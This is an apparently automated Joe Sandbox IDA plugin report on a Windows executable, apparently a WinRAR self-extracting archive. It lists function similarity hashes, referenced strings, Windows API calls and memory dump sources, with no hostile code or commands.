                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                        • API String ID: 2565136772-3242537097
                                                                                        • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                        • Instruction ID: c0bae91a0ae87b26def5240f55e25d24a8fd6c79c9f4d2006a01e9f7af2a0353
                                                                                        • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                        • Instruction Fuzzy Hash: DB213E60E1AA8382FA58FB50EC55274B3A4AF5C794FC83439D94E027A1DF3CF4868321
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                        • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                        • API String ID: 4097890229-4048004291
                                                                                        • Opcode ID: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
                                                                                        • Instruction ID: 3926d845111a877fc85998de2c39bbbcf3580ecc9f7acf13e31aaf9576f9f2c6
                                                                                        • Opcode Fuzzy Hash: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
                                                                                        • Instruction Fuzzy Hash: D812D222B19B4280EB10EB75E8441ADA371EF89B98F906236DB5D07BE9DF3CD545C360
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                        • API String ID: 2868844859-1533471033
                                                                                        • Opcode ID: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
                                                                                        • Instruction ID: f246bde4b019a5ac2f06cc1296cb159ccbe250b771d585cfc38c4f2ff625c21b
                                                                                        • Opcode Fuzzy Hash: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
                                                                                        • Instruction Fuzzy Hash: 6081AF62F18A4285FB04EBA5DC402EDB371AF9C794F846136DE1D1769AEF38D546C320
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                        • API String ID: 3215553584-2617248754
                                                                                        • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                        • Instruction ID: d8fb57faa4a81118925ed7df6a9ae4b18c1ec1ee72caf3c5a44602645e4be140
                                                                                        • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                        • Instruction Fuzzy Hash: 32419C72A09B4589E705DF25E8417E9B3A8EF18398F81523AEE8C07B54DF38D065C354
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                        • String ID: STATIC
                                                                                        • API String ID: 2845197485-1882779555
                                                                                        • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                        • Instruction ID: c6a6aee6445aa54fdf53a27c2434c40b5126ce6935bfd602542abe52b51ac90a
                                                                                        • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                        • Instruction Fuzzy Hash: 28316F25B08A4286FA64BB11ED547B9A3A1EFCDBD4F882434DD4D07B55DF3CD4068760
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextWindow
                                                                                        • String ID: LICENSEDLG
                                                                                        • API String ID: 2478532303-2177901306
                                                                                        • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                        • Instruction ID: 945d3e3a9580ee78027f91e26482aac697712c0414ac195583326e6a2abdae2f
                                                                                        • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                        • Instruction Fuzzy Hash: 1A416E21B0CA5282FB54AB15EC54779A3A1EF8CF85F986535D90E07BA5CF3CE586C320
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                        • API String ID: 2915667086-2207617598
                                                                                        • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                        • Instruction ID: b4f5fdea09811fe82bec1243e7e497089be22d0f762b58fb4d7581fc4e06f388
                                                                                        • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                        • Instruction Fuzzy Hash: 8B315C24A09B4681FA18EB25FD58179B3A4EF8CBA4FC43136C90E077A4DF7CE5818324
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: $
                                                                                        • API String ID: 3668304517-227171996
                                                                                        • Opcode ID: f030c4eb17d52201791ace9f286aabb5ba9f942de39f9151f6af03753080fb30
                                                                                        • Instruction ID: 005a57b642562832b2e80fd6f34d0ff68b912d34d9087e6849c4cbc4274d8f9e
                                                                                        • Opcode Fuzzy Hash: f030c4eb17d52201791ace9f286aabb5ba9f942de39f9151f6af03753080fb30
                                                                                        • Instruction Fuzzy Hash: 42F1D262F1574680FF18AB65D8481BCA361AF9CB98F986231CA6D17BD5DF7CE080C361
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 2940173790-393685449
                                                                                        • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                        • Instruction ID: 30050c1ca2633284f13746f6220aaad27104636f855623a6e70ec99de22821b1
                                                                                        • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                        • Instruction Fuzzy Hash: 5FE1C172A087828AE710AF64D8803ADB7A2FF69758F942135DECD47796DF38E485C710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocClearStringVariant
                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                        • API String ID: 1959693985-3505469590
                                                                                        • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                        • Instruction ID: 6c2d8d67491e6d91ca77f3489b5bb9b36fb34ebd19343f9bb5c2adeee1d523f8
                                                                                        • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                        • Instruction Fuzzy Hash: 3A712D76A14A1585EB20DF25EC905ADB7B4FF8CB98B846136EA4D43B64DF3CD584C320
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B7371
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B737F
                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B73A9
                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B73EF
                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B73FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                        • Instruction ID: d4c9cdced284066bcc02563383dbf4b01b1e7f000c98eb12ff3ac3c66ce5a6d5
                                                                                        • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                        • Instruction Fuzzy Hash: 1131E521A1A68281FE19BB06EC00675A794FF9CBB0F996636DD5D0B780DF3CE0458330
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B162B
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B1648
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B1664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                        • API String ID: 667068680-1718035505
                                                                                        • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                        • Instruction ID: e6f065f549cac53f3fd692486176885e5417bc8115b059c2496f68d0620413f0
                                                                                        • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                        • Instruction Fuzzy Hash: 77111E20A1AB4282FE69AB04FD50374E2AD6F1C798FDC7439C85D06759EF3CB4849631
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E7951A4: GetVersionExW.KERNEL32 ref: 00007FF70E7951D5
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79ED8C
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79ED98
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EDA8
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EDB6
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EDC4
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EE05
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                        • Instruction ID: 6304df710bfef05c10e2afe1a263addbad4bfbcd22e4c3492404fd4566a43514
                                                                                        • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                        • Instruction Fuzzy Hash: FB518BB2B106528AEB04DFB8D8441ACB7B1FB4CB98BA0503ADE0D57B58DF38E546C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                        • Instruction ID: d663da2b01f8f1307665cca65516fbde749f46467e0e7f552b9a07c281d80b8c
                                                                                        • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                        • Instruction Fuzzy Hash: 1D313962B10A518EFB04DFB5E8801BC7770FF08758B94602AEE0E97A58EF38D895C711
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: .rar$exe$rar$sfx
                                                                                        • API String ID: 3668304517-630704357
                                                                                        • Opcode ID: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
                                                                                        • Instruction ID: 51394f34f2c9b0299771ae8e50ca4d2fa3d1d3a5e397ed720e3d1ae9ad6a72f8
                                                                                        • Opcode Fuzzy Hash: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
                                                                                        • Instruction Fuzzy Hash: C1A1A222A1860640EA08EB35DC553BCA361FF59BA8F942236DE5D076E5DF3CE581C360
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: abort$CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 2889003569-2084237596
                                                                                        • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                        • Instruction ID: 10b782ab7ef79be1ed62de598b9754cbafe993c0323909639fb6c3ddf6911b5b
                                                                                        • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                        • Instruction Fuzzy Hash: CC91B073A08B818AE711EB64E8803ADBBA1FB18788F545139EF8C57B55DF38D195CB10
                                                                                        APIs
                                                                                        Strings
